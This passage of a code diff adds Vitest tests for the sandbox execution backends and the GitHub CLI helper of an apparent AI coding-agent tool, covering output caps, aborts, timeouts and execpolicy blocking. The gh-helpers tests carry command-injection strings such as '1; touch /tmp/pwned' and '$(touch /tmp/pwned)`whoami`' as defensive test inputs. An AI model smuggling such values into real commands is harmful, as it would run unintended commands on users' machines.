expect(result.exitCode).toBe(0); + expect(result.stdout.length).toBe(1024 * 1024); + expect(result.stderr).toBe(""); + }); + + it("treats signaled execWithArgs exits as failures", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + const sandbox = new DockerSandbox(); + (sandbox as unknown as { containerId: string | null }).containerId = + "container-123"; + + const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"]); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("partial output")); + child.stderr.emit("data", Buffer.from("terminated by signal")); + child.emit("close", null, "SIGKILL"); + + await expect(promise).resolves.toEqual({ + stdout: "partial output", + stderr: "terminated by signal", + exitCode: 1, + }); + expect(childProcessMock.spawn).toHaveBeenCalledWith( + "docker", + ["exec", "container-123", "gh", "pr", "view", "1"], + { + signal: undefined, + stdio: ["ignore", "pipe", "pipe"], + }, + ); + }); + + it("returns an ExecResult when docker spawn fails", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + const sandbox = new DockerSandbox(); + (sandbox as unknown as { containerId: string | null }).containerId = + "container-456"; + + const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"]); + await Promise.resolve(); + child.emit( + "error", + Object.assign(new Error("spawn docker ENOENT"), { code: "ENOENT" }), + ); + + await expect(promise).resolves.toEqual({ + stdout: "", + stderr: "spawn docker ENOENT", + exitCode: 1, + }); + }); + + it("wraps abortable execWithArgs in a shell that forwards cancellation", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + const sandbox = new DockerSandbox(); + (sandbox as unknown as { containerId: string | null }).containerId = + "container-789"; + const controller = new AbortController(); + + const promise = sandbox.execWithArgs( + "gh", + ["repo", "clone", "owner/repo"], + { + signal: controller.signal, + }, + ); + await Promise.resolve(); + child.emit("close", 0); + + await expect(promise).resolves.toEqual({ + stdout: "", + stderr: "", + exitCode: 0, + }); + expect(childProcessMock.spawn).toHaveBeenCalledWith( + "docker", + [ + "exec", + "container-789", + "sh", + "-lc", + expect.stringContaining("trap on_signal TERM INT HUP"), + "sh", + "gh", + "repo", + "clone", + "owner/repo", + ], + { + signal: controller.signal, + stdio: ["ignore", "pipe", "pipe"], + }, + ); + }); +}); diff --git a/test/sandbox/local-sandbox.test.ts b/test/sandbox/local-sandbox.test.ts new file mode 100644 index 000000000..964f709ed --- /dev/null +++ b/test/sandbox/local-sandbox.test.ts @@ -0,0 +1,139 @@ +import { EventEmitter } from "node:events"; +import { beforeEach, describe, expect, it, vi } from "vitest"; + +const childProcessMock = vi.hoisted(() => ({ + spawn: vi.fn(), +})); + +vi.mock("node:child_process", async () => { + const actual = + await vi.importActual( + "node:child_process", + ); + return { + ...actual, + spawn: childProcessMock.spawn, + }; +}); + +import { LocalSandbox } from "../../src/sandbox/local-sandbox.js"; + +type MockChildProcess = EventEmitter & { + pid?: number; + stdout: EventEmitter; + stderr: EventEmitter; + kill: ReturnType; +}; + +function createMockChildProcess(pid = 1234): MockChildProcess { + const child = new EventEmitter() as MockChildProcess; + child.pid = pid; + child.stdout = new EventEmitter(); + child.stderr = new EventEmitter(); + child.kill = vi.fn(); + return child; +} + +describe("LocalSandbox", () => { + beforeEach(() => { + childProcessMock.spawn.mockReset(); + }); + + it("caps execWithArgs stdout while preserving the child exit code", async () => { + const sandbox = new LocalSandbox(); + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = sandbox.execWithArgs( + process.execPath, + ["-e", "process.stdout.write('x'.repeat(5000))"], + { maxBuffer: 1025 }, + ); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("x".repeat(5000))); + child.emit("close", 0); + + const result = await promise; + + expect(childProcessMock.spawn).toHaveBeenCalledWith( + process.execPath, + ["-e", "process.stdout.write('x'.repeat(5000))"], + expect.objectContaining({ + detached: true, + stdio: ["ignore", "pipe", "pipe"], + }), + ); + expect(result.exitCode).toBe(0); + expect(result.stdout).toHaveLength(1025); + expect(result.stderr).toBe(""); + }); + + it("treats signaled execWithArgs exits as failures", async () => { + const sandbox = new LocalSandbox(); + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"]); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("partial output")); + child.stderr.emit("data", Buffer.from("terminated by signal")); + child.emit("close", null, "SIGKILL"); + + await expect(promise).resolves.toEqual({ + stdout: "partial output", + stderr: "terminated by signal", + exitCode: 1, + }); + }); + + it("preserves spawn error messages when execWithArgs rejects before stderr streams", async () => { + const sandbox = new LocalSandbox(); + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = sandbox.execWithArgs("missing-gh", ["--version"]); + await Promise.resolve(); + child.emit( + "error", + Object.assign(new Error("spawn missing-gh ENOENT"), { code: "ENOENT" }), + ); + + await expect(promise).resolves.toEqual({ + stdout: "", + stderr: "spawn missing-gh ENOENT", + exitCode: 1, + }); + }); + + it("terminates the spawned process group when execWithArgs is aborted", async () => { + const sandbox = new LocalSandbox(); + const child = createMockChildProcess(4321); + const killSpy = vi.spyOn(process, "kill").mockReturnValue(true); + const controller = new AbortController(); + childProcessMock.spawn.mockReturnValueOnce(child); + + try { + const promise = sandbox.execWithArgs( + "gh", + ["repo", "clone", "owner/repo"], + { + signal: controller.signal, + }, + ); + await Promise.resolve(); + + controller.abort(); + child.emit("close", null, "SIGTERM"); + + await expect(promise).resolves.toEqual({ + stdout: "", + stderr: "", + exitCode: 1, + }); + expect(killSpy).toHaveBeenCalledWith(-4321, "SIGTERM"); + expect(child.kill).not.toHaveBeenCalled(); + } finally { + killSpy.mockRestore(); + } + }); +}); diff --git a/test/sandbox/native-sandbox-max-buffer.test.ts b/test/sandbox/native-sandbox-max-buffer.test.ts new file mode 100644 index 000000000..42215b140 --- /dev/null +++ b/test/sandbox/native-sandbox-max-buffer.test.ts @@ -0,0 +1,104 @@ +import { EventEmitter } from "node:events"; +import { mkdirSync, rmSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { afterEach, beforeEach, describe, expect, it, vi } from "vitest"; + +const childProcessMock = vi.hoisted(() => ({ + exec: vi.fn(), + spawn: vi.fn(), +})); + +vi.mock("node:child_process", () => childProcessMock); +vi.mock("node:os", async () => { + const actual = await vi.importActual("node:os"); + return { + ...actual, + platform: () => "darwin", + }; +}); + +import { NativeSandbox } from "../../src/sandbox/native-sandbox.js"; + +type MockChildProcess = EventEmitter & { + stdout: EventEmitter; + stderr: EventEmitter; +}; + +function createMockChildProcess(): MockChildProcess { + const child = new EventEmitter() as MockChildProcess; + child.stdout = new EventEmitter(); + child.stderr = new EventEmitter(); + return child; +} + +describe("NativeSandbox", () => { + let testDir: string; + + beforeEach(() => { + childProcessMock.exec.mockReset(); + childProcessMock.spawn.mockReset(); + testDir = join(tmpdir(), `native-sandbox-max-buffer-${Date.now()}`); + mkdirSync(testDir, { recursive: true }); + }); + + afterEach(() => { + rmSync(testDir, { recursive: true, force: true }); + }); + + it("caps execWithArgs output to the provided buffer size", async () => { + const sandbox = new NativeSandbox({ mode: "workspace-write" }, testDir); + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = sandbox.execWithArgs("gh", ["api"], { maxBuffer: 1025 }); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("x".repeat(5000))); + child.emit("close", 0); + + const result = await promise; + + expect(result.exitCode).toBe(0); + expect(result.stdout).toHaveLength(1025); + expect(result.stderr).toBe(""); + expect(childProcessMock.spawn.mock.calls[0]?.[2]).not.toHaveProperty( + "maxBuffer", + ); + }); + + it("treats signaled exec exits as failures", async () => { + const sandbox = new NativeSandbox({ mode: "workspace-write" }, testDir); + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = sandbox.exec("gh api"); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("partial output")); + child.stderr.emit("data", Buffer.from("terminated by signal")); + child.emit("close", null, "SIGKILL"); + + await expect(promise).resolves.toEqual({ + stdout: "partial output", + stderr: "terminated by signal", + exitCode: 1, + }); + }); + + it("treats signaled execWithArgs exits as failures", async () => { + const sandbox = new NativeSandbox({ mode: "workspace-write" }, testDir); + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = sandbox.execWithArgs("gh", ["api"]); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("partial output")); + child.stderr.emit("data", Buffer.from("terminated by signal")); + child.emit("close", null, "SIGKILL"); + + await expect(promise).resolves.toEqual({ + stdout: "partial output", + stderr: "terminated by signal", + exitCode: 1, + }); + }); +}); diff --git a/test/sandbox/native-sandbox.test.ts b/test/sandbox/native-sandbox.test.ts index f3bb631a3..99aee48f4 100644 --- a/test/sandbox/native-sandbox.test.ts +++ b/test/sandbox/native-sandbox.test.ts @@ -697,6 +697,27 @@ describe("Native Sandbox", () => { await sandbox.dispose(); }); + it("returns an ExecResult when execWithArgs is unsupported", async () => { + if (platform() === "darwin" && isNativeSandboxAvailable()) return; + + const sandbox = createNativeSandbox( + { mode: "workspace-write" }, + testDir, + ); + await sandbox.initialize(); + + try { + const result = await sandbox.execWithArgs("gh", ["--version"]); + expect(result.stdout).toBe(""); + expect(result.stderr).toMatch( + /Refusing to run unsandboxed|not supported on platform/, + ); + expect(result.exitCode).toBe(1); + } finally { + await sandbox.dispose(); + } + }); + it("passes environment variables", async () => { if (!isNativeSandboxAvailable()) return; diff --git a/test/tools/bash.test.ts b/test/tools/bash.test.ts index fecf2c9f0..f56e458d5 100644 --- a/test/tools/bash.test.ts +++ b/test/tools/bash.test.ts @@ -78,6 +78,36 @@ describe("bash tool", () => { expect(output).toContain("Registry OK"); }); + it("passes abort signals into sandbox execution", async () => { + const controller = new AbortController(); + const sandbox = { + exec: vi.fn().mockResolvedValue({ + stdout: "sandbox ok", + stderr: "", + exitCode: 0, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await bashTool.execute( + "bash-sandbox-signal", + { command: "gh auth status" }, + controller.signal, + { sandbox }, + ); + + expect(getTextOutput(result)).toContain("sandbox ok"); + expect(sandbox.exec).toHaveBeenCalledWith( + "gh auth status", + undefined, + undefined, + controller.signal, + ); + }); + it("executes pwd command", async () => { const result = await bashTool.execute("bash-2", { command: "pwd", @@ -390,6 +420,36 @@ describe("bash tool", () => { vi.useRealTimers(); } }); + + it("passes abort signals through sandbox execution", async () => { + const controller = new AbortController(); + const sandbox = { + exec: vi.fn().mockResolvedValue({ + stdout: "sandbox ok", + stderr: "", + exitCode: 0, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await bashTool.execute( + "bash-sandbox-abort", + { command: "echo sandbox" }, + controller.signal, + { sandbox }, + ); + + expect(result.isError).toBeFalsy(); + expect(sandbox.exec).toHaveBeenCalledWith( + "echo sandbox", + undefined, + undefined, + controller.signal, + ); + }); }); describe("special characters", () => { diff --git a/test/tools/gh-helpers.test.ts b/test/tools/gh-helpers.test.ts new file mode 100644 index 000000000..5d5b893cb --- /dev/null +++ b/test/tools/gh-helpers.test.ts @@ -0,0 +1,1059 @@ +import { EventEmitter } from "node:events"; +import { beforeEach, describe, expect, it, vi } from "vitest"; +import type { Sandbox } from "../../src/sandbox/types.js"; + +const childProcessMock = vi.hoisted(() => ({ + spawn: vi.fn(), +})); +const shellEnvMock = vi.hoisted(() => ({ + resolveShellEnvironment: vi.fn(), +})); +const shellUtilsMock = vi.hoisted(() => ({ + killProcessTree: vi.fn(), +})); +const execpolicyMock = vi.hoisted(() => ({ + checkCommand: vi.fn(), +})); +const safeModeMock = vi.hoisted(() => ({ + requirePlanCheck: vi.fn(), +})); +const bashToolMock = vi.hoisted(() => ({ + execute: vi.fn(), +})); + +vi.mock("node:child_process", () => childProcessMock); +vi.mock("../../src/utils/shell-env.js", () => shellEnvMock); +vi.mock("../../src/tools/shell-utils.js", () => shellUtilsMock); +vi.mock("../../src/safety/execpolicy.js", () => execpolicyMock); +vi.mock("../../src/safety/safe-mode.js", () => safeModeMock); + +vi.mock("../../src/tools/bash.js", () => ({ bashTool: bashToolMock })); + +import { + checkGhCliAvailable, + executeGhCommand, +} from "../../src/tools/gh-helpers.js"; + +type MockChildProcess = EventEmitter & { + pid?: number; + stdout: EventEmitter; + stderr: EventEmitter; + kill: ReturnType; +}; + +function createMockChildProcess(): MockChildProcess { + const child = new EventEmitter() as MockChildProcess; + child.pid = 1234; + child.stdout = new EventEmitter(); + child.stderr = new EventEmitter(); + child.kill = vi.fn(); + return child; +} + +function getTextOutput( + result: Awaited>, +): string { + const first = result.content[0]; + return first && "text" in first ? first.text : ""; +} + +describe("executeGhCommand", () => { + beforeEach(() => { + vi.useRealTimers(); + childProcessMock.spawn.mockReset(); + shellEnvMock.resolveShellEnvironment.mockReset(); + shellEnvMock.resolveShellEnvironment.mockReturnValue({ PATH: "/mock-bin" }); + shellUtilsMock.killProcessTree.mockReset(); + execpolicyMock.checkCommand.mockReset(); + execpolicyMock.checkCommand.mockReturnValue({ + decision: "allow", + matchedRules: [], + }); + safeModeMock.requirePlanCheck.mockReset(); + bashToolMock.execute.mockReset(); + }); + + it("passes gh arguments without a shell", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = executeGhCommand("gh-argv", [ + "pr", + "view", + "1; touch /tmp/pwned", + ]); + child.stdout.emit("data", Buffer.from("ok")); + child.emit("close", 0); + + const result = await promise; + + expect(childProcessMock.spawn).toHaveBeenCalledWith( + "gh", + ["pr", "view", "1; touch /tmp/pwned"], + { + detached: true, + env: { PATH: "/mock-bin" }, + stdio: ["ignore", "pipe", "pipe"], + shell: false, + }, + ); + expect(execpolicyMock.checkCommand).toHaveBeenCalledWith( + "gh pr view '1; touch /tmp/pwned'", + process.cwd(), + ); + expect(shellEnvMock.resolveShellEnvironment).toHaveBeenCalledWith( + undefined, + { + workspaceDir: process.cwd(), + }, + ); + expect(getTextOutput(result)).toBe("ok"); + }); + + it("blocks gh argv commands forbidden by execpolicy", async () => { + execpolicyMock.checkCommand.mockReturnValueOnce({ + decision: "forbidden", + matchedRules: [ + { + type: "prefix", + matchedPrefix: ["gh", "repo", "clone"], + }, + ], + }); + + const result = await executeGhCommand("gh-policy", [ + "repo", + "clone", + "owner/repo", + ]); + + expect(childProcessMock.spawn).not.toHaveBeenCalled(); + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command blocked by execpolicy"); + expect(getTextOutput(result)).toContain("prefix: gh repo clone"); + }); + + it("executes gh through the sandbox when one is provided", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValue({ + stdout: "sandbox ok", + stderr: "", + exitCode: 0, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await executeGhCommand( + "gh-sandbox", + ["repo", "clone", "owner/repo$(touch /tmp/pwned)`whoami`"], + undefined, + sandbox as unknown as Sandbox, + ); + + expect(childProcessMock.spawn).not.toHaveBeenCalled(); + expect(sandbox.exec).not.toHaveBeenCalled(); + expect(sandbox.execWithArgs).toHaveBeenCalledWith( + "gh", + ["repo", "clone", "owner/repo$(touch /tmp/pwned)`whoami`"], + { + env: { PATH: "/mock-bin" }, + maxBuffer: 40 * 1024 + 1, + signal: expect.any(AbortSignal), + }, + ); + expect(getTextOutput(result)).toBe("sandbox ok"); + }); + + it("cleans up sandbox abort listeners after successful execution", async () => { + const listeners = new Set<() => void>(); + const signal = { + aborted: false, + reason: undefined, + addEventListener: vi.fn( + (_event: string, listener: EventListenerOrEventListenerObject) => { + if (typeof listener === "function") { + listeners.add(listener); + } + }, + ), + removeEventListener: vi.fn( + (_event: string, listener: EventListenerOrEventListenerObject) => { + if (typeof listener === "function") { + listeners.delete(listener); + } + }, + ), + } as unknown as AbortSignal; + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValue({ + stdout: "sandbox ok", + stderr: "", + exitCode: 0, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await executeGhCommand( + "gh-sandbox-cleanup", + ["pr", "view", "1"], + signal, + sandbox as unknown as Sandbox, + ); + + expect(result.isError).toBe(false); + expect(listeners.size).toBe(0); + expect(signal.removeEventListener).toHaveBeenCalledTimes(2); + }); + + it("requires safe-mode plans for mutating gh commands", async () => { + safeModeMock.requirePlanCheck.mockImplementationOnce(() => { + throw new Error("Safe mode requires a plan before executing gh."); + }); + + await expect( + executeGhCommand("gh-safe-mode", ["repo", "clone", "owner/repo"]), + ).rejects.toThrow("Safe mode requires a plan"); + + expect(safeModeMock.requirePlanCheck).toHaveBeenCalledWith("gh"); + expect(childProcessMock.spawn).not.toHaveBeenCalled(); + }); + + it("does not require safe-mode plans for read-only gh commands", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = executeGhCommand("gh-readonly", ["pr", "view", "1"]); + child.stdout.emit("data", Buffer.from("ok")); + child.emit("close", 0); + + await expect(promise).resolves.toBeTruthy(); + expect(safeModeMock.requirePlanCheck).not.toHaveBeenCalled(); + }); + + it("caps oversized sandbox execWithArgs stdout and reports truncation", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValue({ + stdout: "x".repeat(50 * 1024), + stderr: "", + exitCode: 0, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await executeGhCommand( + "gh-sandbox-large-output", + ["pr", "diff", "1"], + undefined, + sandbox as unknown as Sandbox, + ); + const output = getTextOutput(result); + const capturedOutput = output.split("\n\n")[0] ?? ""; + + expect(sandbox.execWithArgs).toHaveBeenCalledWith( + "gh", + ["pr", "diff", "1"], + expect.objectContaining({ maxBuffer: 40 * 1024 + 1 }), + ); + expect((capturedOutput.match(/x/g) ?? []).length).toBe(40 * 1024); + expect(output).toContain("stdout exceeded 40KB limit and was truncated"); + }); + + it("fails closed when sandbox gh lacks argv execution support", async () => { + const sandbox = { + exec: vi.fn(), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await executeGhCommand( + "gh-sandbox-no-argv", + ["repo", "clone", "owner/repo"], + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain( + "requires argv-capable sandbox support", + ); + expect(sandbox.exec).not.toHaveBeenCalled(); + }); + + it("reports sandbox execWithArgs aborts as cancelled", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn( + ( + _command: string, + _args: string[] = [], + options?: { signal?: AbortSignal }, + ) => + new Promise((resolve) => { + options?.signal?.addEventListener( + "abort", + () => + resolve({ + stdout: "", + stderr: "", + exitCode: 0, + }), + { once: true }, + ); + }), + ), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + const controller = new AbortController(); + + const promise = executeGhCommand( + "gh-sandbox-abort-exec-with-args", + ["repo", "clone", "owner/repo"], + controller.signal, + sandbox as unknown as Sandbox, + ); + controller.abort(); + + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command cancelled"); + }); + + it("times out sandbox gh execution even when the sandbox ignores aborts", async () => { + vi.useFakeTimers(); + try { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn(() => new Promise(() => {})), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const promise = executeGhCommand( + "gh-sandbox-timeout", + ["pr", "view", "1"], + undefined, + sandbox as unknown as Sandbox, + ); + await vi.advanceTimersByTimeAsync(90_000); + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command timed out after 90s"); + } finally { + vi.useRealTimers(); + } + }); + + it("removes sandbox abort listeners after gh completes", async () => { + const controller = new AbortController(); + const addListener = vi.spyOn(controller.signal, "addEventListener"); + const removeListener = vi.spyOn(controller.signal, "removeEventListener"); + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValue({ + stdout: "ok", + stderr: "", + exitCode: 0, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await executeGhCommand( + "gh-sandbox-listener-cleanup", + ["pr", "view", "1"], + controller.signal, + sandbox as unknown as Sandbox, + ); + + expect(result.isError).not.toBe(true); + expect(addListener).toHaveBeenCalledWith( + "abort", + expect.any(Function), + expect.objectContaining({ once: true }), + ); + expect(removeListener).toHaveBeenCalledWith("abort", expect.any(Function)); + expect(removeListener).toHaveBeenCalledTimes(2); + }); + + it("does not spawn gh when the signal is already aborted", async () => { + const controller = new AbortController(); + controller.abort(); + + await expect( + executeGhCommand( + "gh-aborted-before-start", + ["pr", "view"], + controller.signal, + ), + ).rejects.toThrow("GitHub CLI command aborted before start"); + + expect(childProcessMock.spawn).not.toHaveBeenCalled(); + }); + + it("catches aborts that happen while gh is spawning", async () => { + const child = createMockChildProcess(); + const controller = new AbortController(); + childProcessMock.spawn.mockImplementationOnce(() => { + controller.abort(); + return child; + }); + + const promise = executeGhCommand( + "gh-abort-during-spawn", + ["pr", "view"], + controller.signal, + ); + + expect(childProcessMock.spawn).toHaveBeenCalledWith( + "gh", + ["pr", "view"], + expect.objectContaining({ signal: controller.signal }), + ); + expect(shellUtilsMock.killProcessTree).toHaveBeenCalledWith(1234); + + child.emit("close", null); + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command cancelled"); + expect(getTextOutput(result)).not.toContain("Exit code: null"); + }); + + it("returns install guidance when gh is missing on direct spawn", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = executeGhCommand("gh-missing", ["pr", "view"]); + child.emit( + "error", + Object.assign(new Error("spawn gh ENOENT"), { code: "ENOENT" }), + ); + + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain( + "GitHub CLI (gh) is not installed.", + ); + }); + + it("returns install guidance for sandbox gh probes with non-zero output", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValueOnce({ + stdout: "", + stderr: "gh: command not found", + exitCode: 127, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result).not.toBeNull(); + expect(getTextOutput(result!)).toContain( + "GitHub CLI (gh) is not installed.", + ); + expect(bashToolMock.execute).not.toHaveBeenCalled(); + expect(sandbox.exec).not.toHaveBeenCalled(); + expect(sandbox.execWithArgs).toHaveBeenCalledWith( + "gh", + ["--version"], + expect.objectContaining({ + env: { PATH: "/mock-bin" }, + maxBuffer: 40 * 1024 + 1, + }), + ); + }); + + it("surfaces sandbox gh probe capability failures instead of reporting gh missing", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValueOnce({ + stdout: "", + stderr: "Daytona abortable execution requires session API support", + exitCode: 1, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain( + "GitHub CLI availability check failed.", + ); + expect(getTextOutput(result!)).toContain( + "Daytona abortable execution requires session API support", + ); + expect(getTextOutput(result!)).not.toContain( + "GitHub CLI (gh) is not installed.", + ); + }); + + it("treats Daytona session timeout probe failures as timeout errors", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValueOnce({ + stdout: "", + stderr: "Daytona session command timed out", + exitCode: 1, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain( + "Daytona session command timed out", + ); + expect(getTextOutput(result!)).not.toContain( + "GitHub CLI availability check failed.", + ); + }); + + it("does not report sandbox runtime ENOENT errors as missing gh", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn().mockResolvedValueOnce({ + stdout: "", + stderr: "spawn docker ENOENT", + exitCode: 1, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain( + "GitHub CLI availability check failed.", + ); + expect(getTextOutput(result!)).toContain("spawn docker ENOENT"); + expect(getTextOutput(result!)).not.toContain( + "GitHub CLI (gh) is not installed.", + ); + }); + + it("reports already-cancelled sandbox gh probes as cancelled", async () => { + const controller = new AbortController(); + controller.abort(); + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn(() => new Promise(() => {})), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + controller.signal, + sandbox as unknown as Sandbox, + ); + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain("Command cancelled"); + expect(getTextOutput(result!)).not.toContain("Command timed out"); + }); + + it("passes resolved shell env to sandbox gh auth probes", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi + .fn() + .mockResolvedValueOnce({ + stdout: "gh version 2.0.0", + stderr: "", + exitCode: 0, + }) + .mockResolvedValueOnce({ + stdout: "Logged in to github.com", + stderr: "", + exitCode: 0, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + shellEnvMock.resolveShellEnvironment.mockReturnValueOnce({ + GH_TOKEN: "token-from-policy", + PATH: "/mock-bin", + }); + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result).toBeNull(); + expect(bashToolMock.execute).not.toHaveBeenCalled(); + expect(sandbox.exec).not.toHaveBeenCalled(); + expect(sandbox.execWithArgs).toHaveBeenNthCalledWith( + 1, + "gh", + ["--version"], + { + env: { GH_TOKEN: "token-from-policy", PATH: "/mock-bin" }, + maxBuffer: 40 * 1024 + 1, + signal: expect.any(AbortSignal), + }, + ); + expect(sandbox.execWithArgs).toHaveBeenNthCalledWith( + 2, + "gh", + ["auth", "status"], + { + env: { GH_TOKEN: "token-from-policy", PATH: "/mock-bin" }, + maxBuffer: 40 * 1024 + 1, + signal: expect.any(AbortSignal), + }, + ); + }); + + it("surfaces sandbox gh auth probe failures after gh is installed", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi + .fn() + .mockResolvedValueOnce({ + stdout: "gh version 2.0.0", + stderr: "", + exitCode: 0, + }) + .mockResolvedValueOnce({ + stdout: "", + stderr: "HTTP 401: bad credentials", + exitCode: 1, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain( + "GitHub CLI authentication check failed.", + ); + expect(getTextOutput(result!)).toContain("HTTP 401: bad credentials"); + expect(getTextOutput(result!)).not.toContain( + "GitHub CLI (gh) is not installed.", + ); + }); + + it("reports sandbox auth probe capability failures as availability failures", async () => { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi + .fn() + .mockResolvedValueOnce({ + stdout: "gh version 2.0.0", + stderr: "", + exitCode: 0, + }) + .mockResolvedValueOnce({ + stdout: "", + stderr: "Daytona abortable execution requires session API support", + exitCode: 1, + }), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain( + "GitHub CLI availability check failed.", + ); + expect(getTextOutput(result!)).toContain( + "Daytona abortable execution requires session API support", + ); + expect(getTextOutput(result!)).not.toContain( + "GitHub CLI authentication check failed.", + ); + }); + + it("times out sandbox gh availability probes", async () => { + vi.useFakeTimers(); + try { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn( + ( + _command: string, + _args: string[] = [], + _options?: { signal?: AbortSignal }, + ) => new Promise(() => {}), + ), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const promise = checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + await vi.advanceTimersByTimeAsync(90_000); + const result = await promise; + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain("Command timed out after 90s"); + expect(sandbox.execWithArgs).toHaveBeenCalledWith( + "gh", + ["--version"], + expect.objectContaining({ + signal: expect.any(AbortSignal), + }), + ); + } finally { + vi.useRealTimers(); + } + }); + + it("times out sandbox gh auth probes", async () => { + vi.useFakeTimers(); + try { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi + .fn() + .mockResolvedValueOnce({ + stdout: "gh version 2.0.0", + stderr: "", + exitCode: 0, + }) + .mockImplementationOnce( + ( + _command: string, + _args: string[] = [], + _options?: { signal?: AbortSignal }, + ) => new Promise(() => {}), + ), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const promise = checkGhCliAvailable( + undefined, + sandbox as unknown as 